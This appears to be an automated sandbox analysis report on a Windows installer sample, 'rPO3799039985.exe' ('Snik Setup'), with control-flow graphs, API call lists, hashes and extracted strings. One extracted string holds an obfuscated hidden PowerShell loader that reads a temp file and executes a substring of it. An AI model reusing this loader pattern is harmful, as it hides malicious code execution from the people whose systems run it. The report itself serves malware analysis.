4051e2-4051e8 call 403f49 170->174 171->174 172->156 173->173 175 4053a9-4053c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 4053cb-4053eb SendMessageA 175->177 177->177 178 4053ed-405401 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->156
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                                                                                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405401
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                          • String ID: Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 590372296-158401218
                                                                                                                                                                                                          • Opcode ID: f2655e17f1c29db469806ccc784f5eaafc8cdfea11381c65d7ae9fc160b482ac
                                                                                                                                                                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2655e17f1c29db469806ccc784f5eaafc8cdfea11381c65d7ae9fc160b482ac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                                                                                                                                                          Function 00405D51 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 423 405d51-405d5c 424 405d5e-405d6d 423->424 425 405d6f-405d84 423->425 424->425 426 405f77-405f7b 425->426 427 405d8a-405d95 425->427 428 405f81-405f8b 426->428 429 405da7-405db1 426->429 427->426 430 405d9b-405da2 427->430 431 405f96-405f97 428->431 432 405f8d-405f91 call 405d2f 428->432 429->428 433 405db7-405dbe 429->433 430->426 432->431 435 405dc4-405df9 433->435 436 405f6a 433->436 437 405f14-405f17 435->437 438 405dff-405e0a GetVersion 435->438 439 405f74-405f76 436->439 440 405f6c-405f72 436->440 443 405f47-405f4a 437->443 444 405f19-405f1c 437->444 441 405e24 438->441 442 405e0c-405e10 438->442 439->426 440->426 448 405e2b-405e32 441->448 442->441 445 405e12-405e16 442->445 449 405f58-405f68 lstrlenA 443->449 450 405f4c-405f53 call 405d51 443->450 446 405f2c-405f38 call 405d2f 444->446 447 405f1e-405f2a call 405c8d 444->447 445->441 451 405e18-405e1c 445->451 461 405f3d-405f43 446->461 447->461 453 405e34-405e36 448->453 454 405e37-405e39 448->454 449->426 450->449 451->441 457 405e1e-405e22 451->457 453->454 459 405e72-405e75 454->459 460 405e3b-405e5e call 405c16 454->460 457->448 464 405e85-405e88 459->464 465 405e77-405e83 GetSystemDirectoryA 459->465 472 405e64-405e6d call 405d51 460->472 473 405efb-405eff 460->473 461->449 463 405f45 461->463 470 405f0c-405f12 call 405f9a 463->470 467 405ef2-405ef4 464->467 468 405e8a-405e98 GetWindowsDirectoryA 464->468 466 405ef6-405ef9 465->466 466->470 466->473 467->466 471 405e9a-405ea4 467->471 468->467 470->449 476 405ea6-405ea9 471->476 477 405ebe-405ed4 SHGetSpecialFolderLocation 471->477 472->466 473->470 479 405f01-405f07 lstrcatA 473->479 476->477 480 405eab-405eb2 476->480 481 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 477->481 482 405eef 477->482 479->470 484 405eba-405ebc 480->484 481->466 481->482 482->467 484->466 484->477
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersion.KERNEL32(?,Completed,00000000,00404F80,Completed,00000000), ref: 00405E02
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E7D
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E90
                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0041C1AE), ref: 00405ECC
                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(0041C1AE,: Completed), ref: 00405EDA
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(0041C1AE), ref: 00405EE5
                                                                                                                                                                                                          • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                                                                                                                          • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00404F80,Completed,00000000), ref: 00405F59
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                          • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 900638850-146550638
                                                                                                                                                                                                          • Opcode ID: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                                                                                                                          • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                                                                                                                                                          Function 00406033 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(75083410,0042B0B8,C:\,004058D2,C:\,C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                          • String ID: C:\
                                                                                                                                                                                                          • API String ID: 2295610775-3404278061
                                                                                                                                                                                                          • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                                                                                                          • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                                                                                                                                                          Function 00403A41 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 196 403c51-403c6c 188->196 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 197 403ac2-403ac5 191->197 198 403aa8-403abd DestroyWindow 191->198 192->191 194->195 216 403c1b-403c3a SendMessageA 194->216 195->188 201 403ee1 195->201 202 403c75-403c7b 196->202 203 403c6e-403c70 call 40140b 196->203 207 403ac7-403ad3 SetWindowLongA 197->207 208 403ad8-403ade 197->208 205 403ebe-403ec4 198->205 204 403ee3-403eea 201->204 212 403c81-403c8c 202->212 213 403e9f-403eb8 DestroyWindow EndDialog 202->213 203->202 205->201 210 403ec6-403ecc 205->210 207->204 214 403b81-403b8f call 403f7b 208->214 215 403ae4-403af5 GetDlgItem 208->215 210->201 218 403ece-403ed7 ShowWindow 210->218 212->213 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 212->219 213->205 214->204 220 403b14-403b17 215->220 221 403af7-403b0e SendMessageA IsWindowEnabled 215->221 216->204 218->201 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 224 403b19-403b1a 220->224 225 403b1c-403b1f 220->225 221->201 221->220 227 403b4a-403b4f call 403eed 224->227 228 403b21-403b27 225->228 229 403b2d-403b32 225->229 227->214 230 403b68-403b7b SendMessageA 228->230 231 403b29-403b2b 228->231 229->230 232 403b34-403b3a 229->232 230->214 231->227 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->214 246 403b5c-403b66 235->246 245 403b48 236->245 245->227 246->245 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->196 267 403db4-403db6 258->267 267->196 268 403dbc-403dc0 267->268 269 403dc2-403dc8 268->269 270 403ddf-403df3 DestroyWindow 268->270 269->201 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->196 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->201 274->201 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403AAE
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Snik Setup: Completed,?,Snik Setup: Completed,Snik Setup), ref: 00403D8E
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,Snik Setup: Completed), ref: 00403D9D
                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                          • String ID: Snik Setup$Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 3282139019-903832360
                                                                                                                                                                                                          • Opcode ID: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                                                                                                                          • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                                                                                                                                                          Function 004036AF Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 282 4036af-4036c7 call 4060c8 285 4036c9-4036d9 call 405c8d 282->285 286 4036db-40370c call 405c16 282->286 295 40372f-403758 call 403974 call 40588f 285->295 291 403724-40372a lstrcatA 286->291 292 40370e-40371f call 405c16 286->292 291->295 292->291 300 40375e-403763 295->300 301 4037df-4037e7 call 40588f 295->301 300->301 303 403765-403789 call 405c16 300->303 307 4037f5-40381a LoadImageA 301->307 308 4037e9-4037f0 call 405d51 301->308 303->301 309 40378b-40378d 303->309 311 40389b-4038a3 call 40140b 307->311 312 40381c-40384c RegisterClassA 307->312 308->307 313 40379e-4037aa lstrlenA 309->313 314 40378f-40379c call 4057cc 309->314 325 4038a5-4038a8 311->325 326 4038ad-4038b8 call 403974 311->326 315 403852-403896 SystemParametersInfoA CreateWindowExA 312->315 316 40396a 312->316 320 4037d2-4037da call 4057a1 call 405d2f 313->320 321 4037ac-4037ba lstrcmpiA 313->321 314->313 315->311 319 40396c-403973 316->319 320->301 321->320 324 4037bc-4037c6 GetFileAttributesA 321->324 328 4037c8-4037ca 324->328 329 4037cc-4037cd call 4057e8 324->329 325->319 335 403941-403942 call 40501a 326->335 336 4038be-4038d8 ShowWindow call 40605a 326->336 328->320 328->329 329->320 340 403947-403949 335->340 341 4038e4-4038f6 GetClassInfoA 336->341 342 4038da-4038df call 40605a 336->342 343 403963-403965 call 40140b 340->343 344 40394b-403951 340->344 347 4038f8-403908 GetClassInfoA RegisterClassA 341->347 348 40390e-403931 DialogBoxParamA call 40140b 341->348 342->341 343->316 344->325 349 403957-40395e call 40140b 344->349 347->348 353 403936-40393f call 4035ff 348->353 349->325 353->319
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                                          • lstrcatA.KERNEL32(1033,Snik Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Snik Setup: Completed,00000000,00000002,75083410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPO3799039985.exe",00000000), ref: 0040372A
                                                                                                                                                                                                          • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,1033,Snik Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Snik Setup: Completed,00000000,00000002,75083410), ref: 0040379F
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(: Completed), ref: 004037BD
                                                                                                                                                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen), ref: 00403806
                                                                                                                                                                                                            • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                                                                                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                                                                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                                                                                                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                                                                                                                                          • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Snik Setup: Completed$_Nb
                                                                                                                                                                                                          • API String ID: 1975747703-400253189
                                                                                                                                                                                                          • Opcode ID: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
                                                                                                                                                                                                          • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                                                                                                                                                          Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 359 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 370 402cf9-402d10 368->370 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 370->373 374 402d14-402d1d call 4030b1 370->374 373->374 382 402d23-402d2a 374->382 383 402e45-402e4d call 402c02 374->383 378 402df0-402e08 call 4030c7 call 4030b1 375->378 379 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 375->379 376->361 378->376 402 402e0a-402e10 378->402 379->376 407 402e4f-402e60 379->407 386 402da6-402daa 382->386 387 402d2c-402d40 call 40595d 382->387 383->376 392 402db4-402dba 386->392 393 402dac-402db3 call 402c02 386->393 387->392 405 402d42-402d49 387->405 398 402dc9-402dd3 392->398 399 402dbc-402dc6 call 40613d 392->399 393->392 398->370 406 402dd9 398->406 399->398 402->376 402->379 405->392 411 402d4b-402d52 405->411 406->369 408 402e62 407->408 409 402e68-402e6d 407->409 408->409 412 402e6e-402e74 409->412 411->392 413 402d54-402d5b 411->413 412->412 414 402e76-402e91 SetFilePointer call 40595d 412->414 413->392 415 402d5d-402d64 413->415 419 402e96 414->419 415->392 417 402d66-402d86 415->417 417->376 418 402d8c-402d90 417->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->406 420->421 421->392 422 402da2-402da4 421->422 422->392
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C77
